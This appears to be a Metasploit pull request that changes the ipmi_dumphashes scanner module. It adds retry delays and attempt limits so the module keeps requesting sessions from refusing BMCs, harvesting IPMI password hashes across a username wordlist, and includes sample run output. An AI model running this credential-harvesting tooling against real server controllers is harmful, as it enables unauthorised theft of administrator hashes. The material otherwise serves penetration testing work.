### PR TITLE
Fix ipmi_dumphashes - session refused after few failed attempts

### DIFF
--- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
@@ -41,7 +40,9 @@ class MetasploitModule < Msf::Auxiliary
       ]),
       OptString.new('OUTPUT_HASHCAT_FILE', [false, "Save captured password hashes in hashcat format"]),
       OptString.new('OUTPUT_JOHN_FILE', [false, "Save captured password hashes in john the ripper format"]),
-      OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true])
+      OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true]),
+      OptInt.new('SESSION_RETRY_DELAY', [true, "Delay between session retries in seconds", 5]),
+      OptInt.new('SESSION_MAX_ATTEMPTS', [true, "Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)", 5])
     ])
 
   end
@@ -87,10 +88,14 @@ class MetasploitModule < Msf::Auxiliary
     passwords << ""
     passwords = passwords.uniq
 
+    delay_value = datastore['SESSION_RETRY_DELAY'].to_i
+    max_session_attempts = datastore['SESSION_MAX_ATTEMPTS'].to_i
+
     self.udp_sock = Rex::Socket::Udp.create({'Context' => {'Msf' => framework, 'MsfExploit' => self}})
     add_socket(self.udp_sock)
 
     reported_vuln = false
+    session_succeeded = false
 
     usernames.each do |username|
       console_session_id = Rex::Text.rand_text(4)
@@ -103,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
       sess_data = nil
 
       # It may take multiple tries to get a working "session" on certain BMCs (HP iLO 4, etc)
-      1.upto(5) do |attempt|
+      1.upto(max_session_attempts) do |attempt|
 
         r = nil
         1.upto(3) do
@@ -126,10 +131,13 @@ class MetasploitModule < Msf::Auxiliary
         end
 
         if sess.data.length < 8
-          ipmi_status("Refused IPMI open session request")
+          ipmi_status("Refused IPMI open session request, waiting #{delay_value} seconds")
           rakp = nil
-          break
+          sleep(delay_value) if session_succeeded
+          next # break
         end
+
+        session_succeeded = true
 
         sess_data = Rex::Proto::IPMI::Session_Data.new.read(sess.data)
 


### PR DESCRIPTION
This pull request fixes an issue with some of the IPMI devices which refuse to create new session after several (usualy 2) failed attemts to dump hash for a specific username. 
Introducing delay when additional session request is refused and not giving up, makes the module to continue and enumerate the rest of the usernames.
(While pen testing we usualy extend the default Kali ipmi_users.txt list to some 20+ entries)

## Verification

- [ ] Start `msfconsole`
- [ ] `use scanner/ipmi/ipmi_dumphashes`
- [ ] Add 5+ entries into the USER_FILE    (e.g. /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt)
- [ ] `set verbose true`
- [ ] `run` the module

Desired output (all user names get probed):

```
[*] 10.0.0.1:623 - IPMI - Sending IPMI probes
[*] 10.0.0.1:623 - IPMI - Trying username 'ADMIN'...
[-] 10.0.0.1:623 - IPMI - Returned error code 13 for username ADMIN: Unauthorized name
[*] 10.0.0.1:623 - IPMI - Trying username 'admin'...
[-] 10.0.0.1:623 - IPMI - Returned error code 13 for username admin: Unauthorized name
[*] 10.0.0.1:623 - IPMI - Trying username 'root'...
[*] 10.0.0.1:623 - IPMI - Refused IPMI open session request
[*] 10.0.0.1:623 - IPMI - Refused IPMI open session request
[-] 10.0.0.1:623 - IPMI - Returned error code 13 for username root: Unauthorized name
[*] 10.0.0.1:623 - IPMI - Trying username 'Administrator'...
[+] 10.0.0.1:623 - IPMI - Hash found: Administrator:<redacted>
[*] 10.0.0.1:623 - IPMI - Trying username 'USERID'...
[*] 10.0.0.1:623 - IPMI - Refused IPMI open session request
[-] 10.0.0.1:623 - IPMI - Returned error code 13 for username USERID: Unauthorized name
[*] 10.0.0.1:623 - IPMI - Trying username 'guest'...
[-] 10.0.0.1:623 - IPMI - Returned error code 13 for username guest: Unauthorized name
[*] 10.0.0.1:623 - IPMI - Trying username 'Admin'...
[*] 10.0.0.1:623 - IPMI - Refused IPMI open session request
[*] 10.0.0.1:623 - IPMI - Refused IPMI open session request
[-] 10.0.0.1:623 - IPMI - Returned error code 13 for username Admin: Unauthorized name
[*] 10.0.0.1:623 - IPMI - Trying username 'adminilo'...
[-] 10.0.0.1:623 - IPMI - Returned error code 13 for username adminilo: Unauthorized name
[*] 10.0.0.1:623 - IPMI - Trying username 'iloadmin'...
[*] 10.0.0.1:623 - IPMI - Refused IPMI open session request
[*] 10.0.0.1:623 - IPMI - Refused IPMI open session request
[-] 10.0.0.1:623 - IPMI - Returned error code 13 for username iloadmin: Unauthorized name

```

